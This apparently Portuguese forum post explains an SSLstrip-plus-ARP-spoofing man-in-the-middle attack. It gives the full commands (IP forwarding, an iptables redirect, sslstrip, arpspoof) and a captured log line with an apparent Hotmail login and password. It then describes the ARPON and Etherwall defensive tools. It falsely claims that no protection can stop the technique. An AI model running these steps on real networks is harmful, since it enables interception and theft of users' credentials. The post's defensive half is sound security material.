Detectar e bloquear ataques Man in The Middle
Sslstrip e man-in-the-middle, SSL seguro?
Gustavo Lima+ em 28/07/11 às 2:47 pm
No início desta semana, eu discuti sobre segurança dentro de um Hotel em Vitória. A Outra pessoa teimava em dizer que quando qualquer um acessa um site seguro, com SSL/Certificado digital, nenhum hacker/cracker poderia roubar os seus dados. Eu argumentei que não era bem assim e que há técnicas que possibilitam o roubo de dados, mesmo navegando em sites seguros – SSL.
Eis que o o blog unknownantisec fez um excelente post explicando como executar um ataque Man in the middle em conjunto com a ferramenta SSLstrip, a qual já foi comentada várias vezes no blog.
Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
Eis que o o blog unknownantisec fez um excelente post explicando como executar um ataque Man in the middle em conjunto com a ferramenta SSLstrip, a qual já foi comentada várias vezes no blog.
Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
Veja a imagem a seguir, esta é uma representação de uma conexão normal, sem interceptações, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossível o uso de técnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.
Abaixo segue uma representação de uma conexão interceptada, (usando a técnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo próprio cliente, desta forma os dados chegam até o hacker em texto puro, pois os dois pensam que o hacker é uma fonte confiável.
(Fonte: securityhacker)
================================================== ========
Como é feito o ataque
para isso entre no diretorio do sslstrip:
Código HTML:
#cd /pentest/web/sslstrip
Código HTML:
#python sslstrip.py -h
Código HTML:
sslstrip 0.8 by Moxie Marlinspike Usage: sslstrip <options> Options: -w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message.
Primeiro vamos habilitar ip forward no computador, para que ele possa intender que queremos redirecionar o trafego.
Código HTML:
echo "1" > /proc/sys/net/ipv4/ip_forward
Código HTML:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Código HTML:
#python sslstrip.py -w trafego -l 10000
Assim que abrir o terminal, digite route para saber qual o seu roteador e qual a placa que está conectada, ficaria assim.
Código HTML:
Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.0.0.0 * 255.0.0.0 U 0 0 0 eth0 default 10.25.77.254 0.0.0.0 UG 0 0 0 e
10.25.77.254 é seu router
eth0 é sua placa de rede
Sabendo o que é o que, vamos executar o arpspoof, digite no terminal
Código HTML:
#arpspoof -i eth0 10.25.77.254
Código:
#less trafego
Exemplo de pacote capturado
Código HTML:
2011-07-28 13:49:19,605 SECURE POST Data (login.live.com): login=juana%40hotmail.com&passwd=loa1814&type=11&LoginOptions=3&NewUser=1&MEST=&PPSX=PassportRN&PPFT=CSunM4mofYhigqiObttRmtoFdxf8alO7UBN1O9Jb2EQYF1T5sE4qGl teBPzjSYo1kd1jAsP7rlt80UdeEqjMeasL5WXvuVU%21n8NSpKRq3NxmBsw06rOBOfPnz4pejvv3qm0x7rcejM0zU0oCmtF9mL1UqTYa0VQELVDpWOg3RhYACZhXqKYJAbxteyPX%21Mr1Yrq*Un8yDSMnbAgENcljztLVOk *y&idsbho=1&PwdPad=&sso=&i1=&i2=1&i3=19972&i4=&i12=1&i13=&i14=593&i15=1038
Senha:loa1814
Evitando o Ataque
Ferramentas
ARPON
O que é ARPON?
ARPON ( ARP inspeção manipulador ) é um daemon manipulador portátil que fazer protocolo ARP seguro, a fim de evitar o Man In The Middle (MITM) ataque através de ARP Spoofing , ARP Poisoning Cache ou ARP veneno Routing (APR) ataques. Ele bloqueia também os ataques derivados por isso, que Sniffing, Sequestro, Injection, Filtragem e ataques de colegas para mais ataques derivados complexos, como: DNS Spoofing , WEB Spoofing , Session Hijacking e SSL / TLS Hijacking . & ataques co Isto é possível usando três tipos de anti tecnicas ARP spoofing: a primeira é baseada em Sarpi ou "Static ARP Inspection" em redes configuradas estaticamente sem DHCP, o segundo em DARPI ou "Dynamic ARP Inspection" em redes configuradas de forma dinâmica com DHCP, o terceiro em HARPI ou "híbrido ARP Inspection " em "redes híbridas", que está em estática e dinamicamente (DHCP) redes configuradas em conjunto. ARPON é, portanto, um pró-ativa Point-to-Point , Ponto-a-Multiponto e Multiponto solução baseada que requer um daemon em cada série de a conexão para autenticar cada host através de uma autenticação do tipo de cooperação entre os anfitriões e que não modifica a base protocolo padrão ARP clássico pelo IETF, mas sim define políticas precisas usando Sarpi para redes estáticas, DARPI para redes dinâmicas e HARPI para o híbrido redes de trabalho, tornando protocolo padronizado de hoje e seguro a partir de qualquer intrusão estrangeira.
O suporte para interfaces:
Ethernet, Wireless
Gerencia a interface de rede com:
Iface Desligue, Bota OS, Hibernação OS, OS Suspensão
Solução baseada Proactive para conexões:
Ponto-a-Ponto, Ponto-a-Multiponto, Multipoint
Tipo de autenticação para o anfitrião:
Cooperativa entre os hosts
Suporte para redes:
Estaticamente, dinamicamente (DHCP), a rede híbrida que é estática e dinamicamente
Retro compatível com:
ARP clássico base protocolo padrão pelo IETF
Suporte de solicitação ARP gratuito e resposta para:
Failover Cluster, Cluster com balanceamento de carga, alta disponibilidade (HA) Cluster
Bloqueia o Man In The Middle (MITM) ataque por meio de:
ARP Spoofing, ARP Poisoning Cache, ARP veneno Routing (APR)
Três tipos de anti tecnicas ARP spoofing:
Sarpi ou Static ARP Inspection, DARPI ou dinâmica ARP Inspection, HARPI ou híbrido ARP Inspection
Bloqueia os ataques derivados:
Sniffing, Sequestro, Injection, Filtragem e ataques de colegas
Bloqueia os ataques complexos derivados:
DNS Spoofing, WEB Spoofing, Session Hijacking, SSL / TLS Hijacking e ataques de colegas
Testado contra:
Ferramentas Ettercap, Cain & Abel, dsniff, Yersinia, scapy, netcut, Metasploit, arpspoof, sslsniff, sslstrip & co
Compatível com OS
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Fonte: arpon.sourceforgeApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
================================================== ========
Etherwall – Contra ataques Man in The Middle – MITM
O Etherwall é uma ferramenta bem interessante que roda no mundo linux e tem a capacidade de detectar e bloquear ataques Man in The Middle executados via ARP Spoofing/Poisoning. Abixo temos uma lista de algumas de suas features:
Daemon Processing
ARP Packet Filtering
Point to Point & Point to Multipoint Protection
Realtime Protection
System Logging
Early Warning
Support for networks Statically, Dynamically, or Both
Supports for Ethernet Wired & Wireless interface (IEEE 802.3 & IEEE 802.11)
Plugins / Tools
Included Man Pages
Easy to Use and Free
Veja-o em funcionamento na imagem abaixo:
Utilitário tem a capacidade de prevenir ataques Man-in-the-middle
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...